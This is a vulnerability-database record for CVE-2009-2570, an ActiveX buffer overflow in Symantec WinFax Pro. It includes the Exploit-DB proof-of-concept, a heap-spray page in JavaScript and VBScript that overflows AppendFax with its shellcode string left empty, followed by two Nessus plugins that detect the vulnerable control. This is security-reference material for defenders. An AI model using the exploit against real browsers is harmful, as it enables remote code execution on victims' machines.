ID: CVE-2009-2570
Type: cve
Reporter: cve@mitre.org
Modified: 2018-10-12T21:52:00
Description
Stack-based buffer overflow in the Symantec.FaxViewerControl.1 ActiveX control in WinFax\DCCFAXVW.DLL in Symantec WinFax Pro 10.03 allows remote attackers to execute arbitrary code via a long argument to the AppendFax method.
{"exploitdb": [{"lastseen": "2016-02-01T07:39:12", "bulletinFamily": "exploit", "description": "Symantec Fax Viewer Control 10 (DCCFAXVW.DLL) Remote BOF Exploit. CVE-2009-2570. Remote exploit for windows platform", "modified": "2009-04-29T00:00:00", "published": "2009-04-29T00:00:00", "id": "EDB-ID:8562", "href": "https://www.exploit-db.com/exploits/8562/", "type": "exploitdb", "title": "Symantec Fax Viewer Control 10 DCCFAXVW.DLL Remote BoF Exploit", "sourceData": "<!--\nSymantec Fax Viewer Control v10 (DCCFAXVW.DLL) remote buffer overflow exploit (IE7)\nby Nine:Situations:Group::trotzkista\nsite: http://retrogod.altervista.org/\n\ntested against: Symantec WinFax Pro 10.03\n Internet Explorer 7, XP SP3\n\nsome details:\nCLSID: {C05A1FBC-1413-11D1-B05F-00805F4945F6}\nProgid: Symantec.FaxViewerControl.1\nBinary Path: C:\\Programmi\\WinFax\\DCCFAXVW.DLL\nKillBitted: False\nImplements IObjectSafety: False\nSafe For Initialization (Registry): True\nSafe For Scripting (Registry): True\n-->\n<html>\n<object classid='clsid:C05A1FBC-1413-11D1-B05F-00805F4945F6' id='obj' />\n</object>\n<script language='javascript'>\n// win32_exec - EXITFUNC=seh CMD=c:\\windows\\system32\\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com\nvar scode = unescape(\"\");\nbigblock = unescape(\"%u0c0c%u0c0c\");\nheadersize = 20;\nslackspace = headersize+scode.length;\nwhile (bigblock.length<slackspace) bigblock+=bigblock;\nfillblock = bigblock.substring(0, slackspace);\nblock = bigblock.substring(0, bigblock.length-slackspace);\nwhile(block.length+slackspace<0x40000) block = block+block+fillblock;\nmemory = new Array();\nfor (i=0;i<444;i++){memory[i] = block+scode}\n</script>\n<script language=\"vbscript\">\nobj.AppendFax string(1111,unescape(\"%0c\"))\n</script>\n\n# milw0rm.com [2009-04-29]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8562/"}], "nessus": [{"lastseen": "2019-12-13T09:58:05", "bulletinFamily": "scanner", "description": "The version of the Symantec Fax Viewer Control ActiveX control, a\ncomponent included with Symantec Winfax Pro and installed on the\nremote Windows host, reportedly contains a stack-based buffer overflow\nthat can be triggered by calling the ", "modified": "2019-12-02T00:00:00", "id": "WINFAX_ACTIVEX_APPENDFAX_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/38652", "published": "2009-04-30T00:00:00", "title": "Symantec Fax Viewer Control ActiveX Control AppendFax Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, 
Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(38652);\n script_version(\"1.19\");\n\n script_cve_id(\"CVE-2009-2570\");\n script_bugtraq_id(34766);\n script_xref(name:\"Secunia\", value:\"34925\");\n\n script_name(english:\"Symantec Fax Viewer Control ActiveX Control AppendFax Overflow\");\n script_summary(english:\"Checks for the control\");\n \n script_set_attribute( attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by a\nbuffer overflow vulnerability.\" );\n script_set_attribute( attribute:\"description\", value:\n\"The version of the Symantec Fax Viewer Control ActiveX control, a\ncomponent included with Symantec Winfax Pro and installed on the\nremote Windows host, reportedly contains a stack-based buffer overflow\nthat can be triggered by calling the 'AppendFax' method with an overly\nlong argument. If an attacker can trick a user on the affected host\ninto viewing a specially crafted HTML document, he can leverage this\nissue to execute arbitrary code on the affected system subject to the\nuser's privileges.\" );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://www.nessus.org/u?1078766b\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"https://seclists.org/bugtraq/2009/Apr/285\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"https://seclists.org/bugtraq/2009/Apr/296\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Remove the affected software as it is no longer supported by Symantec.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119);\n 
script_set_attribute(attribute:\"plugin_publication_date\", value: \"2009/04/30\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = '{C05A1FBC-1413-11D1-B05F-00805F4945F6}';\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n ver = activex_get_fileversion(clsid:clsid);\n\n if (ver) ver = string(\"Version \", ver);\n else ver = string(\"An unknown version\");\n\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n ver, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n ver, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n}\nactivex_end();\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2019-12-13T09:17:56", "bulletinFamily": "scanner", "description": "The Microsoft Data Analyzer ActiveX control has a remote code\nexecution vulnerability. The system may also have one or more\nvulnerable third-party ActiveX controls installed.\n\nA remote attacker could exploit these issues by tricking a user into\nrequesting a maliciously crafted web page, resulting in arbitrary code\nexecution.", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS10-008.NASL", "href": "https://www.tenable.com/plugins/nessus/44418", "published": "2010-02-09T00:00:00", "title": "MS10-008: Cumulative Security Update of ActiveX Kill Bits (978262)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44418);\n script_version(\"1.31\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2009-2570\", \"CVE-2009-3735\", \"CVE-2010-0252\");\n script_bugtraq_id(34766, 38045, 38060, 38066, 38067);\n script_xref(name:\"MSFT\", value:\"MS10-008\");\n script_xref(name:\"MSKB\", value:\"978262\");\n\n script_name(english:\"MS10-008: Cumulative Security Update of ActiveX Kill Bits (978262)\");\n script_summary(english:\"Checks if several kill bits have been set\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Windows host is missing an update that disables selected\nActiveX controls.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The Microsoft Data Analyzer ActiveX control has a remote code\nexecution vulnerability. 
The system may also have one or more\nvulnerable third-party ActiveX controls installed.\n\nA remote attacker could exploit these issues by tricking a user into\nrequesting a maliciously crafted web page, resulting in arbitrary code\nexecution.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-008\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for Windows 2000, XP, 2003,\nVista, 2008, and 7.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(94, 119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/04/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n 
exit(0);\n}\n\n\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\ninclude(\"misc_func.inc\");\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-008';\nkbs = make_list(\"978262\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0, \"The registry wasn't enumerated.\");\nif (hotfix_check_sp(win2k:6, xp:4, win2003:3, vista:3, win7:1) <= 0)\n exit(0, \"The host is not affected based on its version / service pack.\");\nif (hotfix_check_server_core() == 1) exit(0, \"Windows Server Core installs are not affected.\");\nif (activex_init() != ACX_OK) exit(1, \"Unable to initialize the ActiveX API.\");\n\n\n\nkb = \"978262\";\n\n# Test each control.\ninfo = \"\";\nclsids = make_list(\n '{E0ECA9C3-D669-4EF4-8231-00724ED9288F}', # max3activex.dll\n '{C05A1FBC-1413-11D1-B05F-00805F4945F6}', # Symantec WinFax Pro 10.3\n '{5D80A6D1-B500-47DA-82B8-EB9875F85B4D}', # Google Desktop Gadget 5.8\n '{0CCA191D-13A6-4E29-B746-314DEE697D83}', # Facebook Photo Updater 5.5.8\n '{2d8ed06d-3c30-438b-96ae-4d110fdc1fb8}' # PandaActiveScan Installer 2.0\n);\n\nforeach clsid (clsids)\n{\n if (activex_get_killbit(clsid:clsid) == 0)\n {\n info += ' ' + clsid + '\\n';\n if (!thorough_tests) break;\n }\n}\nactivex_end();\n\n\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (max_index(split(info)) > 1) s = \"s\";\n else s = \"\";\n\n report =\n '\\nThe kill bit has not been set for the following control'+s+' :\\n\\n'+\n info;\n\n if (!thorough_tests)\n {\n report +=\n '\\nNote that Nessus did not check whether there were other kill bits\\n'+\n 'that have not been set because the \"Perform thorough tests\" setting\\n'+\n 'was not enabled when this scan was run.\\n';\n }\n hotfix_add_report(info, bulletin:bulletin, kb:kb);\n }\n 
hotfix_security_warning();\n\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}